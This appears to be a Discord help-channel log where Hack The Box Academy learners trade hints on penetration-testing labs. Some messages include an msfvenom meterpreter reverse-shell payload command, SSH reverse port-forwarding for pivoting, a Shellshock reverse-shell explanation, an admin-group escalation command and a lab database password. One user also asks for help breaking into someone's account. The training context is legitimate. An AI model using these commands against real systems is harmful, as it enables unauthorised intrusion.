echo "ns1.inlanefreight.com" > ./resolvers.txt

./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt
#

i've even added the -p flag that prints ANY DNS records in all found subdomains

arctic sentinel
#

what error you get?!

worldly elm
#

No nameservers found, trying fallback list.

arctic sentinel
#

It`s been a while since I did this one 😦 I don't remember doing anything special

#

try another vpn server maybe...

placid quest
#

@arctic sentinel yes

arctic sentinel
placid quest
#

Ok

granite skiff
#

https://academy.hackthebox.com/module/158/section/1427

I'm trying to do this academy section on reverse port forwarding, but I am stuck at the point where you have to run the ssh -R command to get the pivot bounce back traffic from the windows target machine on to my kali box which has a reverse shell listening on port 8000. Here's the diagram I have created of what I am trying to achieve:

#

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN

This command when I try run on my kali box shows the following error:

#

Would someone know what's causing this not to work?

#

Fails even with the proxychains command 😦

autumn pilot
#

are you sure the target has port 22 open?

granite skiff
#

yes I have nmap the windows target and it's open

autumn pilot
#

from the error message seems otherwise

granite skiff
#

Another point to note, I can ping the pivot machine's 10.129.x.x. IP, but I cannot ping its "Internal" IP of 172.16.5.129 and neither that of windows target machine on 172.16.5.19

#

I have transferred the payload from kali box to pivot------------> Pivot to windows target machine as I served a python server and RDP into the windows target from where I pulled the file from the middle box, the pivot. I have run the payload script manually on the windows machine as well as administrator.

dim wolf
#

what's your kali tun0 IP

granite skiff
#

I had created the initial ssh dynamic port forwarding with the pivot box by the following command:

ssh -D 9050 ubuntu@10.129.x.x

dim wolf
#

nvm

granite skiff
#

Pivot's IP 10.129.110.212 and its internal IP 172.16.5.129. Windows target Ip 172.16.5.19

#

I can ping the pivot's 10.129.x.x IP, but cannot ping the other two internal IPs

autumn pilot
#

port 22 is not opened on .5.19

granite skiff
autumn pilot
fierce island
#

Hey all, looking for a nudge with Password attacks; credential hunting in Linux. I can seem to figure out what to do and what the hints suggests πŸ˜…

granite skiff
autumn pilot
#

Β―_(ツ)_/Β―

#

I might have already finished the CPTS path, but who knows

granite skiff
# autumn pilot

Hmmm strange, not sure how they got it to work on the course material

#

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN

dim wolf
#

huh

#

idk why i was overthinking this

#

you're SSHing into ubuntu@172.16.5.19

autumn pilot
#

also, from what I can see in the exercises (questions) below you are not asked to get a rev shell on the windows internal target

granite skiff
#

According to the command not sure why it's sshing into windows target and ubuntu user doesn't make sense

dim wolf
#

the logs below are showing what happens after you execute the payload

carmine lark
#

I set up OpenVas on my Kali yesterday, but I missed, that you have to note down credentials. I tried to reset the admin-password, but it didn't work. What do you recommend me to do?

granite skiff
#

It fails on port 22 and doesn't generate any logs

dim wolf
#

ssh into the pivot host instead of the windows box

granite skiff
#

tried swapping IPs too 😦

dim wolf
#

what's your command

granite skiff
#

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN

autumn pilot
#

On top of that, if you carefully follow the instructions you will get a reverse shell, you must understand what to write as an IP address for the -R command

#

Again, the 5.19 host does not have port 22 open

dim wolf
granite skiff
#

Followed the command syntax as shown 😦

naive citrus
#

Hey, someone can help ? I’m on the module password attack for user Sam on ssh founded ftp tried bruteforce on both but nothing return

#

Please

autumn pilot
#

The syntax is not using the internal IP address of the windows target

granite skiff
#

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

autumn pilot
#

And still, doesn't mention the windows internal host

naive citrus
#

that the question: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.

dim wolf
#

it might help if you look at the command like this

ripe grove
#

I'm working through Attacking Enterprise Networks/Internal Information Gathering. I'm trying to do the SSH pivot. I've done it before on other machines, but I can't seem to get it to work on this lab. I'm following the steps. I first did ssh -D 8081 -i dmz01_key root@10.129.203.111, but the next step in the section is to do netstat to verify that ssh is listening on that port, but I get docker-proxy. So I change it to 9050, but netstat doesn't give me anything on that port. When I try the next step of proxychains nmap, it doesn't work. Any thoughts?

dim wolf
#

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

granite skiff
#

It worked, I changed IPs and used both pivot IPs 😦

#

ssh -R 172.16.5.19:8080:0.0.0.0:8000 ubuntu@172.16.5.129 -vN

granite skiff
#

@dim wolf Thanks for helping πŸ™‚

dim wolf
#

run the payload and make sure it actually works

fierce island
#

Repost:

Hey all, looking for a nudge with Password attacks; credential hunting in Linux. I can seem to figure out what to do and what the hints suggests πŸ˜…

granite skiff
#

It's not getting the reverse shell, although now it's showing the logs on kali box and reverse port forwarding is working. Not sure what's wrong now.

rustic sage
#

Am I the only one who struggles with Windows PrivEsc Skill Assessment I ?

Got RevShell through command Injection, but nothing works (tried winpeas, wes, powerup ; and all the assosiated methods and CVE

#

I tried Windows PrivEsc Skill Assessment II and solved all in 20min ... someone has a hint ?

#

damn this new thick applications section thoughπŸ˜‚

fierce island
#

Think I am missing a high level view of what the task wants from me 🧐

autumn pilot
#

you need to mutate it

fierce island
#

Oh

#

Thanks, will try that !

granite skiff
#

@autumn pilot Any insight into why reverse shell is not spawning now as reverse port forwarding is working. Possibly the payload? Not sure

autumn pilot
#

payload

granite skiff
#

Generated the payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

#

of course changed the IP to 172.16.5.129

autumn pilot
#

you need to specify it in the console as well

granite skiff
#

I did run that in my Kali terminal and it generated the backupscript.exe file

rustic sage
#

anyone finish the new Attacking Thick Client Applications? I understood up until the memory maps sectionπŸ˜… keep getting a The file isn't a .NET PE file

granite skiff
autumn pilot
#

think

#

I'm not going to give you the answer, as it is already explained somewhere, and is not hard to get to it

rustic sage
crystal widget
vast geyser
#

Hi there , Does the XXEinjector can execute the error based method?
Could someone give me a hint?

rustic sage
# crystal widget hi, can I dm you? I am stuck at this module

unfortunately, I'm not really qualified to help on that sectionπŸ˜… the only way I could help is by giving the answer which I don't see as beneficial. all I'll say is look at the pictures and reread and you'll be able to tell what to dump. once I get an explanation and actually understand what's going on I'll be able to help you πŸ™‚

rustic sage
pliant light
#

Anyone able to help with the Broken Authentication module - predictable reset token question 1? I feel like I've tried everything at this point and I can't even seem to recreate the generated hash for htbuser.

rustic sage
#

are you asking how -dump works?

hasty solar
#

anyone knows why on ATTACKING ENTERPRISE NETWORKS Lateral Movement I receive the following error when trying to escalate privileges?
C:\Windows\system32>ο»Ώnet localgroup administrators ilfserveradm /add
'ο»Ώnet' is not recognized as an internal or external command,
operable program or batch file.

vast geyser
rustic sage
#

what section is this?

#

that's the module, what section are you in

#

look at the right hand side, the Table of Contents.. what section are you asking about.

#

you do need the --dump flag if you want to "dump" the content of a specific table.

zenith gazelle
#

Hello guys!
One thing in the Vulnerability Assessment module > Nessus Skills Assessment the question " What were the targets for the authentication scan ?" Where exactly I need to see, like I answered all the other questions about nessus, this one is the last one and I cannot understand where I need to see to get the answer!

rustic sage
granite skiff
#

😘

#

After two days of trying I have finally got the rev shell on my kali box. Learnt a ton during all this, more about myself πŸ™‚

zenith gazelle
#

: |, I literally try everything because I thought that answer was to abvious to be the real answer.

I guess I need to use the philosophy of keep things simple.

Thank you!

autumn pilot
#

it basically asks you what was the target(s) that have been scanned

serene dew
#

How do I be a hacker?

quick cloud
#

Getting frustrated everyday on a problem that seems impossible to solve but then solving it is my strat

gentle root
#

On host #1 of the Live Engagement for Reverse Shells and Payloads - ||Does anybody know what the second vulnerability is on host1? The hint says "This host has two upload vulnerabilities.", I found and exploited the one using apache tomcat succesfully, (port 8080), but on port 80 is there a separate one that I am missing? ||

twilit cipher
#

Did the "Attacking Common Applications" module grow overnight? I thought I was finished with it!

steady totem
rustic sage
twilit cipher
#

I just finished the Skills Assessment III. That was easy. @rustic sage if I have issues with that, can I ping you?

#

GL, @steady totem

rustic sage
twilit cipher
#

I should get to that later today. I'll look for you then. πŸ™‚

heavy dome
#

Hey friend !!!
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
||i'm in jason user , don't know further , for dennis and root access||,|| I suppose I should look at the services but I don't know what to do||...HELP!

rustic sage
thorn urchin
#

theres a certain cycle of mentality you should get into for these things. Once youve elevated access you should think "What can I plunder?" look for creds, secrets, ect. then go to enumeration of, "what can I access that I couldnt before, what can this user use that I couldnt earlier?"

#

but have a plunder first mentality

#

and this is a general tip, not just for that skill assessment

rustic sage
#

ok

fierce island
autumn pilot
#

You don't need a 94,000 words wordlist

fierce island
#

That was the mutated one from the previous module :<

gritty sundial
#

Can I dm someone regarding a hint of the LFI Skill assessment?
Was able to get the source code of index, but I'm stuck with the RCE.

fierce island
jaunty vigil
#

anyone has been able to submit the uname value as the answer for the new thick client stuff?

night depot
#

I need help for SMB, footprinting module. For the third question: β€œConnect to the discovered share and find the flag.txt file. Submit the contents as the answer”.

I found flag.txt and opened it and got the flag but when I submit it, HTB said it was wrong. Did I misunderstand the question?

thorn urchin
#

probably an errant space

rustic sage
#

tbh I think thick client could've and should've been it's own module that was a lotπŸ˜…

steady hawk
#

In Broken Authentication - Brute Forcing Cookies I was able to get the answer to the second question with the help of Cyberchef's Magic functionality. I was able to determine the first two encoding methods by looking at them, but for the last one I'm not sure how I could've identified it. Would someone be able to explain to me how to identify the last encoding method manually please? I tried magic numbers, but I couldn't find any that match

fierce island
#

I can't get any entry with "Credential Hunting in Linux" been using the mutated password of Kira with the ftp and ssh service, to no avail. Anybody who care assist?

royal sigil
#

hello when i try to connect to xfreerdp server for this module (Packet Inception, Dissecting Network Traffic With Wireshark) i have (bash: xfreerdp: command not foud ) any solution

royal sigil
#

ok

magic lotus
#

Hello,
I'm doing the SQLi Fundamentals model, I'm doing the exercise for this section Subverting Query Logic.
I'm able to login, I already have the passwords for all users, but I'm unable to find the flag.
some help will be appreciated.
Thanks

rustic sage
quiet ember
#

Anyone around for a question on the Shells & Payloads skill assessment?

static roost
#

https://www.infosecarticles.com/exploiting-shellshock-vulnerability/. So I'm trying to wrap my head around the ShellShock vulnerability in Unix systems(CVE-2014-6271). I MOSTLY understand the mechanics behind it. The linked article mentions the following ```
The User-Agent value used in curl is stored as an environment variable on the remote machine. By default, this is set to HTTP_USER_AGENT = curl/7.47.0 when using curl. However, this value can be modified. We can store malicious code that sets up a reverse shell inside this environment variable.

INFOSEC ARTICLES

In this article, I will be explaining how you can exploit a shellshock vulnerability manually as well as with metasaploit.

thorn urchin
#

the vuln is how the server is passing the user agent header from clients. curl has a default user agent that you can set, but whatever client you use so long as you put it in the user agent is good enough.

#

for this particular scenario at least

#

plenty of shellshock vuln systems have nothing to do with user agents

magic lotus
static roost
#

@thorn urchin So do ALL servers store the User-Agent value in the environment? Seems kinda strange. I looked for explicit answers to this on the google but none of the answers make sense.

abstract rune
#

can you talk on this serrver and if so how

thorn urchin
#

this exploit has nothing to do with environment variables

#

also just realized this is the modules channel, which is off topic

abstract rune
#

can somebody please awnser me3

abstract rune
#

thx

#

but can somebody awnser me how do i talk

thorn urchin
#

this channel is for module discussion, not newbies first discord how to

static roost
#

@thorn urchin The question stems from "Attacking Common Gateway Interface (CGI) Applications - Shellshock" in the Module "Attacking Common Applications". It mentions environment variables as the means through which this exploit can be achieved. I'll do some more research on it. Thank you for your responses.

night hawk
#

Inveigh.exe and Inveigh.ps1 not working at all

thorn urchin
static roost
#

AAAHH I see

thorn urchin
night hawk
#

Okey so spawn this machine and try it out :))

thorn urchin
#

ive already completed the module and looked at my assessment notes :))

night hawk
#

Good to know

#

Now its not working anymore

thorn urchin
#

well I reiterate the conditions I said above

night hawk
#

I do it so for every version that was release

#

On MS01

#

I dm u

thorn urchin
#

sure

hollow thunder
#

would anyone be able to assist me in XSS session hi-jacking section?

#

been stuck for a day. I can't seem to find the correct payload.

ashen fog
#

ATTACKING COMMON SERVICES Attacking SMB
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer
I found the password for jason but cant login to SSH
Can someone give me a hint

ashen fog
#

And then the sript.js and index.php from before

hollow thunder
analog tendon
#

bit of a spoiler there

ashen fog
#

smbclient -U jason -L ////10.129.254.186//GGJ
Enter WORKGROUP\jason's password:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
GGJ             Disk      Priv
IPC$            IPC       IPC Service (attcsvc-linux Samba)

SMB1 disabled -- no workgroup available

#

Does someone know how to get arround this SMB1 disabled

thorn urchin
#

dont need to

#

also yeah, we do hints here, giving out answers outright is bad

ashen fog
#

SRY

hollow thunder
#

To be fair. I for some reason thought the text said to only test the username and fullname field. I was throwing payloads at it for the past day. Definietly a noob moment for not even trying the other fields

hollow thunder
#

I do appreciate the nudge. I was getting frustrated

analog tendon
ashen fog
analog tendon
ashen fog
#

The Share GGJ is READ ONLY

sweet sequoia
#

In the Network Enumeration with Nmap Academy module in the Host Discovery Module, the question is what operating system the Machine in question is running, I guess it to be || Windows || and I was right, I guessed that based off of || [ttl=128 id=40622 iplen=28 ] || with the || ttl || Is that the way I was supposed to know it or was there something else that I should have paid attention to? I guessed right the first time but what bothers me is that I guessed and didnt know

thorn urchin
#

scoop up any useful bits from it

#

Plunder -> Enum -> Exploit

fathom pendant
sweet sequoia
# fathom pendant If you do packet tracing it will tell you in some of the packets

|| Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST
SENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]
RCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]
Nmap scan report for 10.129.2.18
Host is up (0.086s latency).
MAC Address: DE:AD:00:00:BE:EF
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds || was the entire response

#

|| sudo nmap 10.129.2.18 -sn -oA host -PE --packet-trace --disable-arp-ping || was the prompt

#

where does it tell me?

fathom pendant
#

Iirc you need the -O

#

Which does an OS scan

sweet sequoia
#

I didnt actually do this scan, the input and output is given in the module

fathom pendant
#

... run the scan brother

#

And you'll get an answer

sweet sequoia
#

I cant

#

there is no live machine to scan

fathom pendant
#

There should be?

sweet sequoia
#

its not an interactive lesson with a machine

#

doesnt show as interactive either

fathom pendant
#

Let me double check

#

It's been a minute

sweet sequoia
#

this is what im refering to

fathom pendant
#

Ah yeah that part

thorn urchin
#

weird I dont remember that, but in such case yeah the ttl is how you were supposed to know

fathom pendant
#

RCVD ttl

ashen fog
sweet sequoia
#

Yeah thats how I guessed it in the first place, but I wasnt sure that it was the way I was actually supposed to solve it in this case, so I asked just to make sure ^^

thorn urchin
#

read only definitely gives you download access

#

how are you trying to download the files

ashen fog
hollow thunder
sweet sequoia
fathom pendant
#

if you just google "how to determine OS from TTL" it should give you a handful of things that have these types of tables

ashen fog
#

I have to giv the user and the password right

#

?>

thorn urchin
fathom pendant
#

^

thorn urchin
#

not to say smbmap cant work, but im not familiar with it enough to know if your usage is correct

ashen fog
#

worked with user and password dumb of me

still yacht
#

can I get some help with footprinting dont get this question What is the "FQDN of the host where the last octet ends with "x.x.x.203"?" i use dnsenum --dnsserver 10.129.42.x --enum -p 0 -s 0 -o subdomains.txt -f /home/kali/Desktop/SecLists/Discovery/DNS/combined_subdomains.txt --threads 90 inlanefreight.htb

rustic sage
still yacht
#

is it not what I am trying to do with dnsenum ?

#

@rustic sage

gentle root
#

You can dig it;)

rustic sage
still yacht
#

yea I already found the internal

thorn urchin
#

what about second internal

rustic sage
#

im working with curl and the http methods and the question is "First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag." i did all of that and search for the city and as a response i just get this

grand girder
#

How do people who are in top 100 learn?

#

Surely they don’t go right into with infinite knowledge

thorn urchin
thorny garnet
#

Hi Guys, I'm getting an error when running the tomcat mgr in metasploit where it says that failed to deploy the payload.

I'm using java/reverse_shell_tcp

#

i'm currently in the Live engagement of shells and payload module

steady totem
#

maybe. Idk if that'll solve it or not for you

tight yacht
#

Hi guys! hope yall are doing well!
I'm stuck at the Password Attack - Password Mutations modules, i found another user besides the one provided and its password, but all it gave me was access to an empty SMB directory, can someone give me some pointers?
I tried access through RPC, NFS, tried to use the same user in another available services with the mutated password list, tried to use the same password with the wordlist of usernames. Nothing worked, i'm kinda lost. Also, sorry if i misspelled something, english is not my native language.
Thank you!

thorny garnet
#

exploit/multi/http/tomcat_mgr_upload

#

I'm also using the correct credentials

steady totem
white basalt
#

Hello! I'm stuck on the "Network Enumeration with Nmap-Nmap Scripting Engine ". I've enumerated all ports and ran the 'http-enum' script. "||sudo nmap -p- --script http-enum 10.129.162.102 --stats-every=60s||"
found a robots.txt on 80 port, which looks like it has the flag in it, but won't work when I input it on the site. Any help?

modest token
#

Okay, I need some help with the Attacking Thick Client Applications module. So I'm on the memory map part. Using x64dgb I got to the banner. In the instructions it says that "there should be an interesting new map added after the ASCII banner is being displayed". The next step is to import the mapped item from memory. So I've dumped litterally every single MAP type in the memory map and ran strings and de4dot on them all and none of them are .NET executables... has anyone been able to solve this one? I'm totally stumped.

rustic sage
#

Hello, Im doing the file uploads module im in whitelist filters lesson, i put a web shell with shell.php\x00.gif but i cannot access to him, somebody can help me?

autumn pilot
#

that extension could be a false-positive

rustic sage
#

and how can try it?

worn anvil
#

hi, in LF module the problem child, I understand " dpkg -l | grep " but once I use " -c '^ii' I dont understand that one, I get checking the history with " -c " but dont understand the next part of the bash script

#

also the question is to find how many total packages are installed on the target system

rustic sage
#

What module are u?

naive sky
#

Hello i wanna ask about ssh attack why its too long

#

actually its same

wild dragon
#

Anyone fixed this issue for Oracle TNS
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory.

wild dragon
# wild dragon Anyone fixed this issue for Oracle TNS sqlplus: error while loading shared libra...
#

creating the oracle.sh file:
/etc/profile.d/oracle.sh

ORACLE_HOME=/usr/lib/oracle/19.6/client64/lib
PATH=$ORACLE_HOME/bin:$PATH
LD_LIBRARY_PATH=$ORACLE_HOME/lib
export ORACLE_HOME
export LD_LIBRARY_PATH
export PATH

run this command:

source /etc/profile.d/oracle.sh

and this command:

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
weary shoal
#

The section "Attacking Thick Client Applications" from "Attacking Common Applications" requires knowledge of reverse engineering, which was never taught before... How do i get through this? Where can i learn all the tools presented there? I got lost... 😦
And also, it is impossible to start PS once inheritance is removed... I had to re-enable it for PS to work - but then it deletes the file after one x64dbg run. Really frustrating

flint chasm
#

Hello
How can I read dovecot file index?

#

I'm in Hard lab of footprinting

vestal musk
#

Considering doing the course and was hoping to hear from others, have any of you guys tried this course and have any advice? Reviews?

solar smelt
#

I'm doing getting started => public Exploits Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start) and when I use msf i get this message (requires mod_cgi to be enabled)?

acoustic owl
# vestal musk Considering doing the course and was hoping to hear from others, have any of you...

Recently I passed the CPTS exam by HackTheBox. In this video I discuss my experience with the course and exam, as well as how it differs from the OSCP.

HTB Discord: https://discord.com/invite/hackthebox

Chapters:
0:00 Introduction
0:29 The Course
3:35 The Exam
5:38 The Report
8:11 Tips & Tricks
11:46 FAQ: How does CPTS compare to OSCP?
18:55 O...

β–Ά Play video

In this video I will share my experience with the CBBH course and exam, as well as some tips I have for people who may be interested in taking it.

Chapters:
0:00 Introduction
0:19 Course: Format & Content
2:31 Course: Duration
3:05 Course: Pwnbox
3:33 Course: Pricing
4:22 Exam: Format & Content
5:09 Exam: Duration
5:59 Exam: Report
7:49 Exam: F...

β–Ά Play video

My review of the new @HackTheBox Certified Penetration Testing Specialist (CPTS) certification - Hope you enjoy πŸ™‚ #HackTheBox #HTB #CTF #Pentesting #OffSec #CPTS #Certification #Course

β†’Social Media↣
Twitter: https://twitter.com/_CryptoCat
GitHub: https://github.com/Crypto-Cat
HackTheBox: https://app.hackthebox.eu/profile/11897
LinkedIn: https:...

β–Ά Play video
autumn pilot
#

Has someone finished the updated bloodhound skill assessment?

acoustic owl
autumn pilot
#

Last question to be fair, can't visualise how to build the cipher query to return a number, as the one I currently have is incorrect

acoustic owl
autumn pilot
#

yeah, I'm aware, however the parameters(queries) are the things that I'm facing an issue with

light fern
#

Hey guys, just working on the intro to bash module and already stuck at the first taks haha, is the module enough for me to understand this and be able to replicate or what? How should I approach it, I am new to scripting so limited experience

spare condor
#

Does anyone else has connectivity issues with Pivoting, Tunneling, and Port Forwarding Skills assessment?

livid bluff
#

Hi,
I'm stuck on attacking common application in Tomcat section at question What role does the admin user have in the configuration example?
there should not be a great complexity but I don't know what I should look for.

rustic sage
rustic sage
livid bluff
rustic sage
livid bluff
rustic sage
light fern
livid bluff
rustic sage
#

anyone know if there has been a fix for Exploiting Web Vulnerabilities in Thick-Client Applications? It's the only section I have leftπŸ˜…

simple zephyr
#

I am doing attacking common applications - attacking wordpress and found the flag in the webroot or so I think but its not taking it. I have no spaces or anything. is someone there that can validate that i have the right flag?

hidden jacinth
#

I need someone to get into an account for me

ripe grove
hidden jacinth
#

Anyone willing to do so?

ripe grove
#

were you able to do the previous one, Attacking Thick Client Applications? I couldn't get the memory dump to work

rustic sage
hidden jacinth
#

Ok

rustic sage
ripe grove
#

I was thinking of trying to open the exe in Ghidra, but that seemed like a rabbit hole

ripe grove
#

I wasn't sure if there was something missing, or if I was missing something

rustic sage
ripe grove
#

ok, I'll revisit it. I was staring at the asm until I was cross eyed

urban anvil
#

Hi can someone help me with Attacking Common Services Skill Assessment Hard?

#

?

urban anvil
# rustic sage https://dontasktoask.com/

i am using crackmapexec and the brute force attack stops after one itteration. I tried Null session to smbclient but it doesn't allow. i am using users.list and pws.list. Am i doing something wrong?

opaque niche
#

Hi, in the sqlmap essentials module, running sqlmap on an http request section, I'm trying to answer the second question, what's the contents of table flag3? (case #3 - cookie id)
When executing the command sqlmap -u 'URL' --cookie='id=1' ,
sqlmap gives me an error that the parameters were not found, any ideas?

rustic sage
gritty sundial
#

Yes, finally completed the LFI skill assessment. If anybody needs a hint, let me know.

rustic sage
livid bluff
#

HI
I'm stuck on attacking Tomcat for find and submit the contents of tomcat_flag.txt
Impossible to find where is this flag !

rustic sage
livid bluff
rustic sage
cyan ginkgo
#

can anyone help iam at footprinting medium iam in the database but i cant find any HTB users

small steppe
#

Request for Help. Module: Footprinting - MySQL
Q: During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?

I enumerated the MySQL service and was able to get a dump of names and email addresses -- HTB isnt taking the email as the appropriate answer?? Not sure if I'm screwing up something in MySQL or if there's an error with HTB.

rustic sage
white basalt
#

excuse me, I am a noob with discord. How can I up load a picture? I have a question to ask. TK

rustic sage
urban anvil
rustic sage
rustic sage
cyan ginkgo
#

i know u have those 4 standart databases but the rest does not contain anything use full

small steppe
rustic sage
rustic sage
small steppe
cyan ginkgo
#

is it the A******* one?

rustic sage
urban anvil
#

@rustic sage this is the output i got for 445 smb

rustic sage
white basalt
#

Hello! I have a problem with academy-regular.ovpn . I try to find a solution on discord and google, but I failed. It took me really long time and drive me CRAZY! Can someone tell me what it is and how to fix it? I ve already asked in the 'community-help' and a friendly guy helped me. However, I cant solve it.😭 I spend 2days on it. Can someone give a hand please? Thank in advancd.

ebon valve
#

I hasve some problems in the shel&payloads module

rustic sage
limber cobalt
#

Hi all, I dont understand nothing on the new section Attacking Thick Client Applications added to Attacking Common Applications module... the** x64db screenshots** are anything but accurate and I don't understand what the creator is referring to. Any help?

rustic sage
#

if you have a question that's not on memory maps I can try and helpπŸ˜… haven't done reversing in a while, but I understand the basics. the only part I had trouble with was that memory maps portion

rustic sage
#

you can dm! I'm working though so my responses may be delayed

limber cobalt
rustic sage
#

I don't work for HTB don't take that seriously

limber cobalt
crisp remnant
#

Can anyone assist a bit with the Attacking Common Applications updated module

crisp remnant
rustic sage
#

I can help on anything, but memory mapsπŸ˜… I solved it, but I'm not really sure how to explain that section without giving the answer.

ancient glade
somber parcel
#

hello, i had a question, i got stuck on the last question in the smb section of the host-based numbering section in the penetration test section, can anyone help?

ebon valve
#

Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension) CD, search commands dont work

fathom pendant
fathom pendant
ebon valve
#

module: shell and payloads Section: Automating Payloads & Delivery with Metasploit

fathom pendant
#

And you dropped into the shell?

ebon valve
#

ya im in it now

fathom pendant
#

Just to be clear, after your payload has been run/session initiated, you typed shell in the msf command line

ebon valve
#

no i didnt im stupid

#

lol

fathom pendant
#

:)

rancid sand
#

Hi guys

ancient glade
#

Module: Shells and Payloads, Section: Live Engagement, Machine 2

rancid sand
#

I just downloaded kali linux πŸ™‚

#

Is this discord server good for begginers?

fathom pendant
#

I'd suggest reading #welcome and looking up "hack the box beginners bible"

somber parcel
#

hello, i had a question, i got stuck on the last question in the smb section of the host-based numbering section in the penetration test section, can anyone help?

rancid sand
#

Can we join little bit on discord?

somber parcel
fathom pendant
ebon valve
#

the find COmmand dont work

ancient glade
#

Is there anyone who has completed shells and payloads that I can message? I'm stuck on the second machine of the live engagement and have completed everything else

somber parcel
#

last question in this section i am missing something or i am writing wrong i have learned a lot i need a hint or an answer

ancient glade
#

Can I PM to avoid spoilers?

steady hawk
#

Sure

fathom pendant
lyric inlet
#

Anyone for "http attacksΓ© module and response splitting ?

ebon valve
#

i got it

velvet atlas
#

such a dumb thing to be stuck on- but can someone help w/attacking gitlab in attacking common applications? I have tried all lists suggested by the hint and found 7 users, but none of them are correct?

rancid sand
#

Hello

#

I got stuck at this

rustic sage
velvet atlas
#

soon as i ask it works- thanks @rustic sage

rustic sage
#

lol

rustic sage
#

literally the question

#

lol

#

but just google

rancid sand
#

Guys

#

on every site I try to enter

#

it gives me this

autumn pilot
#

free users don't have internet

rancid sand
#

bruuuh

#

then

#

how I do the training

#

Interactive section with target

autumn pilot
#

first, write on one line

#

second, you can reach the target over the internet

rancid sand
#

oh, thank

sly nebula
#

Module "ABUSING HTTP MISCONFIGURATIONS", "Common Session Variables (Account Takeover)" Section. After following the exploitation procedure, I'm faced with a MFA form. I could use some help in bypassing it. I'll share what I have done.

faint jungle
#

Has anyone done Corporate OSINT?

acoustic owl
royal sigil
#

hello im stuck on this question can you help me ( What are the client and server port numbers used in first full TCP three-way handshake?)

cursive gull
#

Are the modules in the pen-tester job path written in order? Would you guys recommend doing AD Enumeration before Windows privesc?

thorn urchin
#

if youre doing cpts definitely do the modules in order

cursive gull
#

Ok, thank you

thorn urchin
#

there are some modules that will presume you have done earlier ones, and then some modules wont make a single reference to an earlier module but is 10x easier to complete by applying the earlier information without being prompted to do so.

cursive gull
#

Thanks for the information. I would mainly like to improve my Windows skills, they are severely lacking compared to my Linux / web app skills. πŸ˜…

unreal grail
#

Someone knows how to perform action on SMB share with authentication? The SMBShare is host on a Linux system. I have to be authenticated because of the Group Policy

thorn urchin
#

if youre just trying to upgrade windows skills and not doing cpts then yeah do windows AD and then windows priv esc. If youre not already familiar with pivoting and tunnels, then do the pivoting module before AD or else youll hate yourself on the assessment

cursive gull
#

I'll start on the pivoting module then.

limber cobalt
thorn urchin
#

its literally the lowest quality piece of content ive seen in the entire academy

hazy grotto
#

Anyone able to help me with sqlmap essentials

deft bison
#

anyone else having connection issues? the target spawned is not connecting at all; changed vpn settings multiple times.

limber cobalt
rancid sand
#

Can I share screen to somone?

#

I need some help

deft bison
rancid sand
#

idk finding the flag

deft bison
rancid sand
#

umm

#

lemme see

#

HTTP Methods, sections GET

deft bison
deft bison
#

did you look at the hint?

ashen fog
#

sqsh -S 10.129.170.144 -U .\htbdbuser -P 'MSSQLAccess01!' -h
sqsh-3.0 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Open Client Message
Layer 6, Origin 8, Severity 5, Number 3
ct_connect(): directory service layer: internal directory control layer error: Requested server name not found.

#

Can someone explain me why i cant connect to the MSSQL Server

deft bison
#

also re-read the section for HTTP Authorization Header for that

rancid sand
#

Can I share screen to you?

deft bison
deft bison
turbid root
#

Hi,

Where can I get help for Machine "Soccer"? I am a bit lost in the discord

rancid sand
thorn urchin
#

use your words lol

rancid sand
thorn urchin
#

I know what you said

rancid sand
#

Good for you then if you understood

thorn urchin
#

people generally still dont want to watch a screen share. Describe the problem youre having and provide details and reasoning behind your issue

rancid sand
#

I understand, but maybe he wants, who knows

unreal grail
#

Active Directory Enumeration & Attack - Assessment Part II - Need a Nudge on finding the hahs for CT059! I tried Responder poisoning, Lazagne, dumping lssas and sam with mimikatz. I run out of ideas.

deft bison
vale crescent
#

Is javascript a good language to write malwares?

unreal grail
#

Thank you! πŸ™‚

rancid sand
#

why

autumn pilot
#

line wrapping?

rancid sand
#

what's that

#

Oh I understood

#

After /city/ I forgot to put London =]

formal light
#

Hi, I am working on the dns module, I am on the last one looking for FQDN with .203, I have ran the for command with all the SecLists (at least I believe i have) but I still have not seen this host. Not looking for answer, but just a hint or two or at least make sure I am on the right track. I thank you!

rustic sage
lethal atlas
#

anyone available who has completed the attacking common services module?

#

Im working on the Attacking SQL Databases sesction and I confused by the fact that I am not seeing any sql services running.

#

nm my vpn dropped.

lethal atlas
#

now it wont accept the username and password.